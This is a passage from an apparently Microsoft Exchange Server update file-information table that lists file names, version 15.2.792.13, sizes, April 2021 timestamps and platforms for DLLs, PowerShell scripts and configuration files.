10:03| x86 \nBigfunnel.postinglist.dll| 15.2.792.13| 189,336| 04-Apr-2021| 10:06| x86 \nBigfunnel.query.dll| 15.2.792.13| 101,256| 04-Apr-2021| 10:06| x86 \nBigfunnel.ranking.dll| 15.2.792.13| 109,448| 04-Apr-2021| 10:05| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.792.13| 3,634,576| 04-Apr-2021| 10:04| x86 \nBigfunnel.tracing.dll| 15.2.792.13| 42,880| 04-Apr-2021| 10:05| x86 \nBigfunnel.wordbreakers.dll| 15.2.792.13| 46,472| 04-Apr-2021| 10:03| x86 \nCafe_airfilter_dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64 \nCafe_exppw_dll| 15.2.792.13| 83,328| 04-Apr-2021| 10:04| x64 \nCafe_owaauth_dll| 15.2.792.13| 92,032| 04-Apr-2021| 10:04| x64 \nCalcalculation.ps1| Not applicable| 42,113| 04-Apr-2021| 10:06| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,622| 04-Apr-2021| 10:04| Not applicable \nChksgfiles.dll| 15.2.792.13| 57,216| 04-Apr-2021| 10:07| x64 \nCitsconstants.ps1| Not applicable| 15,821| 04-Apr-2021| 10:04| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 10:04| Not applicable \nCitstypes.ps1| Not applicable| 14,480| 04-Apr-2021| 10:04| Not applicable \nClassificationengine_mce| 15.2.792.13| 1,693,064| 04-Apr-2021| 10:04| Not applicable \nClusmsg.dll| 15.2.792.13| 134,024| 04-Apr-2021| 10:05| x64 \nCoconet.dll| 15.2.792.13| 48,008| 04-Apr-2021| 10:06| x64 \nCollectovermetrics.ps1| Not applicable| 81,660| 04-Apr-2021| 10:04| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 04-Apr-2021| 10:04| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,971| 04-Apr-2021| 10:03| Not applicable \nComplianceauditservice.exe| 15.2.792.13| 39,800| 04-Apr-2021| 10:07| x86 \nConfigureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 10:06| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,344| 04-Apr-2021| 10:05| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,055| 04-Apr-2021| 10:06| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,806| 04-Apr-2021| 10:05| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 10:06| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 10:05| Not applicable \nConnectfunctions.ps1| Not applicable| 37,165| 04-Apr-2021| 10:06| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,440| 04-Apr-2021| 10:07| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,228| 04-Apr-2021| 10:07| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,093| 04-Apr-2021| 10:06| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 10:05| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 10:06| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 10:06| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts_exsmime.dll| 15.2.792.13| 380,800| 04-Apr-2021| 10:07| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,664| 04-Apr-2021| 10:05| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:05| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:04| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:04| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 04-Apr-2021| 10:04| Not applicable \nDependentassemblygenerator.exe| 15.2.792.13| 22,400| 04-Apr-2021| 10:06| x86 \nDiaghelper.dll| 15.2.792.13| 66,944| 04-Apr-2021| 10:05| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,374| 04-Apr-2021| 10:03| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 10:06| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,225| 04-Apr-2021| 10:06| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,694| 04-Apr-2021| 10:06| Not applicable \nDisklockerapi.dll| Not applicable| 22,424| 04-Apr-2021| 10:06| x64 \nDlmigrationmodule.psm1| Not applicable| 39,616| 04-Apr-2021| 10:05| Not applicable \nDsaccessperf.dll| 15.2.792.13| 45,952| 04-Apr-2021| 10:03| x64 \nDscperf.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:03| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 10:04| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEdgetransport.exe| 15.2.792.13| 49,544| 04-Apr-2021| 10:07| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:06| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:07| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 10:06| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,579| 04-Apr-2021| 10:05| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,604| 04-Apr-2021| 10:06| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,638| 04-Apr-2021| 10:06| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 10:05| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,683| 04-Apr-2021| 10:05| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.792.13| 17,800| 04-Apr-2021| 10:07| x86 \nEscprint.dll| 15.2.792.13| 20,360| 04-Apr-2021| 10:05| x64 \nEse.dll| 15.2.792.13| 3,741,592| 04-Apr-2021| 10:04| x64 \nEseback2.dll| 15.2.792.13| 350,080| 04-Apr-2021| 10:03| x64 \nEsebcli2.dll| 15.2.792.13| 318,360| 04-Apr-2021| 10:04| x64 \nEseperf.dll| 15.2.792.13| 108,936| 04-Apr-2021| 10:06| x64 \nEseutil.exe| 15.2.792.13| 425,352| 04-Apr-2021| 10:03| x64 \nEsevss.dll| 15.2.792.13| 44,416| 04-Apr-2021| 10:05| x64 \nEtweseproviderresources.dll| 15.2.792.13| 101,248| 04-Apr-2021| 10:04| x64 \nEventperf.dll| 15.2.792.13| 59,800| 04-Apr-2021| 10:04| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,136| 04-Apr-2021| 10:07| Not applicable \nExchange.format.ps1xml| Not applicable| 649,725| 04-Apr-2021| 10:07| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,370| 04-Apr-2021| 10:06| Not applicable \nExchange.ps1| Not applicable| 20,831| 04-Apr-2021| 10:06| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,551| 04-Apr-2021| 10:07| Not applicable \nExchange.types.ps1xml| Not applicable| 365,180| 04-Apr-2021| 10:07| Not applicable \nExchangeudfcommon.dll| 15.2.792.13| 122,760| 04-Apr-2021| 10:07| x86 \nExchangeudfs.dll| 15.2.792.13| 272,760| 04-Apr-2021| 10:07| x86 \nExchmem.dll| 15.2.792.13| 86,408| 04-Apr-2021| 10:06| x64 \nExchsetupmsg.dll| 15.2.792.13| 19,352| 04-Apr-2021| 10:05| x64 \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 10:05| x64 \nExdbmsg.dll| 15.2.792.13| 230,792| 04-Apr-2021| 10:05| x64 \nExeventperfplugin.dll| 15.2.792.13| 25,472| 04-Apr-2021| 10:07| x64 \nExmime.dll| 15.2.792.13| 364,928| 04-Apr-2021| 10:07| x64 \nExportedgeconfig.ps1| Not applicable| 27,427| 04-Apr-2021| 10:06| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,598| 04-Apr-2021| 10:05| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,246| 04-Apr-2021| 10:05| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,414| 04-Apr-2021| 10:04| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,165| 04-Apr-2021| 10:06| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,084| 04-Apr-2021| 10:06| Not applicable \nExppw.dll| 15.2.792.13| 83,328| 04-Apr-2021| 10:04| x64 \nExprfdll.dll| 15.2.792.13| 26,496| 04-Apr-2021| 10:06| x64 \nExrpc32.dll| 15.2.792.13| 2,029,464| 04-Apr-2021| 10:04| x64 \nExrw.dll| 15.2.792.13| 28,040| 04-Apr-2021| 10:03| x64 \nExsetdata.dll| 15.2.792.13| 2,779,544| 04-Apr-2021| 10:06| x64 \nExsetup.exe| 15.2.792.13| 35,208| 04-Apr-2021| 10:05| x86 \nExsetupui.exe| 15.2.792.13| 471,944| 04-Apr-2021| 10:06| x86 \nExtrace.dll| 15.2.792.13| 245,144| 04-Apr-2021| 10:03| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nExwatson.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:03| x64 \nFastioext.dll| 15.2.792.13| 60,312| 04-Apr-2021| 10:06| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 04-Apr-2021| 10:04| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 04-Apr-2021| 10:04| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 04-Apr-2021| 10:06| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 04-Apr-2021| 10:06| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 04-Apr-2021| 10:04| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 04-Apr-2021| 10:04| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 04-Apr-2021| 10:04| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 10:03| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 04-Apr-2021| 10:04| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 04-Apr-2021| 10:04| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 04-Apr-2021| 10:04| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 04-Apr-2021| 10:05| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 04-Apr-2021| 10:04| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 04-Apr-2021| 10:04| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 04-Apr-2021| 10:05| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 10:04| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,875,757| 04-Apr-2021| 10:05| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 04-Apr-2021| 10:04| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 04-Apr-2021| 10:04| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 10:03| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 10:06| Not applicable \nFilteringpowershell.dll| 15.2.792.13| 223,112| 04-Apr-2021| 10:07| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 04-Apr-2021| 10:07| Not applicable \nFiltermodule.dll| 15.2.792.13| 180,104| 04-Apr-2021| 10:04| x64 \nFipexeuperfctrresource.dll| 15.2.792.13| 15,232| 04-Apr-2021| 10:05| x64 \nFipexeventsresource.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:07| x64 \nFipexperfctrresource.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:05| x64 \nFirewallres.dll| 15.2.792.13| 72,600| 04-Apr-2021| 10:07| x64 \nFms.exe| 15.2.792.13| 1,350,024| 04-Apr-2021| 10:07| x64 \nForefrontactivedirectoryconnector.exe| 15.2.792.13| 110,976| 04-Apr-2021| 10:06| x64 \nFpsdiag.exe| 15.2.792.13| 18,840| 04-Apr-2021| 10:04| x86 \nFsccachedfilemanagedlocal.dll| 15.2.792.13| 822,168| 04-Apr-2021| 10:04| x64 \nFscconfigsupport.dll| 15.2.792.13| 56,712| 04-Apr-2021| 10